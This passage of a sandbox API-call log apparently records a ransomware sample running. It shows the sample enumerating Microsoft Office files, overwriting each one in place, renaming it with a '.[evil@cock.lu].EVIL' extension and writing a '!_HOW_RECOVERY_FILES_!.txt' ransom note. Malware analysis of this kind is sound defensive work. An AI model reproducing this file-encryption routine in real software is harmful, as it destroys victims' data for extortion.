_Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 105 [0103.026] wcscmp (_String1="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.026] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 0x0 [0103.026] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 0x69 [0103.026] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0103.028] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x86339, lpOverlapped=0x0) returned 1 [0103.075] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.075] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.075] _errno () returned 0x84b1160840 [0103.075] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.075] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x86340, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x86340, lpOverlapped=0x0) returned 1 [0103.076] CloseHandle (hObject=0x1a0) returned 1 [0103.076] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.077] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.077] __uncaught_exception () returned 0x84b1160800 [0103.077] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.077] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0103.077] ??_V@YAXPEAX@Z () returned 0x1 [0103.080] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0103.080] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0103.080] wcsstr (_Str="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.080] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 105 [0103.080] wcscmp (_String1="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.080] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 0x0 [0103.080] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 0x69 [0103.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0103.082] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x56a, lpOverlapped=0x0) returned 1 [0103.202] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.202] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.202] _errno () returned 0x84b1160840 [0103.202] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.202] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x580, lpOverlapped=0x0) returned 1 [0103.203] CloseHandle (hObject=0x1a0) returned 1 [0103.203] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.203] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.203] __uncaught_exception () returned 0x84b1160800 [0103.203] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.203] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0103.204] ??_V@YAXPEAX@Z () returned 0x1 [0103.207] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0103.207] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0103.208] wcsstr (_Str="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.208] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 105 [0103.208] wcscmp (_String1="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.208] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 0x0 [0103.208] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 0x69 [0103.208] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0103.210] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fde1e0*=0xe7e, lpOverlapped=0x0) returned 1 [0103.213] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.213] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.214] _errno () returned 0x84b1160840 [0103.214] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.214] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0xe80, lpOverlapped=0x0) returned 1 [0103.214] CloseHandle (hObject=0x1a0) returned 1 [0103.214] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.214] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.214] __uncaught_exception () returned 0x84b1160800 [0103.214] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.215] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml.[evil@cock.lu].evil")) returned 1 [0103.215] ??_V@YAXPEAX@Z () returned 0x1 [0103.218] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", dwFileAttributes=0x200) returned 0 [0103.219] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0103.219] wcsstr (_Str="AppXManifest.common.16.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.219] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.16.xml") returned 78 [0103.219] wcscmp (_String1="AppXManifest.common.16.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.219] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifest.common.16.xml") returned 0x0 [0103.219] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.16.xml") returned 0x4e [0103.219] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.16.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.16.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0103.220] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x100000, lpOverlapped=0x0) returned 1 [0103.344] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.344] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.344] _errno () returned 0x84b1160840 [0103.345] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.345] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x100020, lpOverlapped=0x0) returned 1 [0103.381] CloseHandle (hObject=0x1a0) returned 1 [0103.381] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.16.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.381] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.381] __uncaught_exception () returned 0x84b1160800 [0103.381] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.389] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.16.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.16.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.16.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.16.xml.[evil@cock.lu].evil")) returned 1 [0103.390] ??_V@YAXPEAX@Z () returned 0x1 [0103.393] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.16.xml", dwFileAttributes=0x200) returned 0 [0103.393] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0103.393] wcsstr (_Str="AppXManifestLoc.16.en-us.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.393] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.16.en-us.xml") returned 80 [0103.393] wcscmp (_String1="AppXManifestLoc.16.en-us.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.393] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppXManifestLoc.16.en-us.xml") returned 0x0 [0103.393] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.16.en-us.xml") returned 0x50 [0103.393] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0103.395] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x2701, lpOverlapped=0x0) returned 1 [0103.415] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.415] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.415] _errno () returned 0x84b1160840 [0103.415] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.415] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x2720, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x2720, lpOverlapped=0x0) returned 1 [0103.415] CloseHandle (hObject=0x1a0) returned 1 [0103.415] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.16.en-us.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.415] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.416] __uncaught_exception () returned 0x84b1160800 [0103.416] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.416] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.16.en-us.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.16.en-us.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.16.en-us.xml.[evil@cock.lu].evil")) returned 1 [0103.417] ??_V@YAXPEAX@Z () returned 0x1 [0103.420] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.16.en-us.xml", dwFileAttributes=0x200) returned 0 [0103.420] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0103.420] wcsstr (_Str="AuthoredExtensions.16.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.420] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.16.xml") returned 77 [0103.420] wcscmp (_String1="AuthoredExtensions.16.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.420] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AuthoredExtensions.16.xml") returned 0x0 [0103.420] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.16.xml") returned 0x4d [0103.420] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.16.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.16.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0103.421] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x175, lpOverlapped=0x0) returned 1 [0103.423] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.423] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.423] _errno () returned 0x84b1160840 [0103.423] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.424] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x180, lpOverlapped=0x0) returned 1 [0103.424] CloseHandle (hObject=0x1a0) returned 1 [0103.424] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.16.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.424] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0103.424] __uncaught_exception () returned 0x84b1160800 [0103.424] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.464] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.16.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.16.xml"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.16.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.16.xml.[evil@cock.lu].evil")) returned 1 [0103.465] ??_V@YAXPEAX@Z () returned 0x1 [0103.467] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.16.xml", dwFileAttributes=0x200) returned 0 [0103.468] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0 [0103.468] FindClose (in: hFindFile=0x84b11ddc80 | out: hFindFile=0x84b11ddc80) returned 1 [0103.468] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\PackageManifests") returned 0x33 [0103.468] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0103.468] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0103.468] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\PackageManifests\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0103.469] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0103.469] __uncaught_exception () returned 0x84b1160800 [0103.469] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0103.469] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0103.469] wcsstr (_Str="root", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.469] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root") returned 39 [0103.469] wcscmp (_String1=".", _String2="root") returned -1 [0103.469] wcscmp (_String1="..", _String2="root") returned -1 [0103.469] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root") returned 0x27 [0103.469] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Microsoft Office\\root" | out: _Destination="C:\\\\Program Files\\Microsoft Office\\root") returned 0x0 [0103.469] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\*") returned="C:\\\\Program Files\\Microsoft Office\\root\\*" [0103.469] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11dd1a0 [0103.469] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.469] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\.") returned 41 [0103.469] wcscmp (_String1=".", _String2=".") returned 0 [0103.470] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0103.470] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.470] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\..") returned 42 [0103.470] wcscmp (_String1=".", _String2="..") returned -1 [0103.470] wcscmp (_String1="..", _String2="..") returned 0 [0103.470] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0103.470] wcsstr (_Str="client", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.470] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client") returned 46 [0103.470] wcscmp (_String1=".", _String2="client") returned -1 [0103.470] wcscmp (_String1="..", _String2="client") returned -1 [0103.470] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client") returned 0x2e [0103.470] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Microsoft Office\\root\\client" | out: _Destination="C:\\\\Program Files\\Microsoft Office\\root\\client") returned 0x0 [0103.470] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\*") returned="C:\\\\Program Files\\Microsoft Office\\root\\client\\*" [0103.470] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11ddd40 [0103.627] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.627] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\.") returned 48 [0103.627] wcscmp (_String1=".", _String2=".") returned 0 [0103.627] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.627] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.627] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\..") returned 49 [0103.627] wcscmp (_String1=".", _String2="..") returned -1 [0103.627] wcscmp (_String1="..", _String2="..") returned 0 [0103.627] FindNextFileW (in: hFindFile=0x84b11ddd40, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0103.627] wcsstr (_Str="api-ms-win-core-file-l1-2-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0103.627] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 78 [0103.627] wcscmp (_String1="api-ms-win-core-file-l1-2-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0103.627] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-file-l1-2-0.dll") returned 0x0 [0103.627] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll") returned 0x4e [0103.627] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0103.629] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x48c0, lpOverlapped=0x0) returned 1 [0103.637] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.637] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0103.637] _errno () returned 0x84b1160840 [0103.637] SetFilePointer (in: 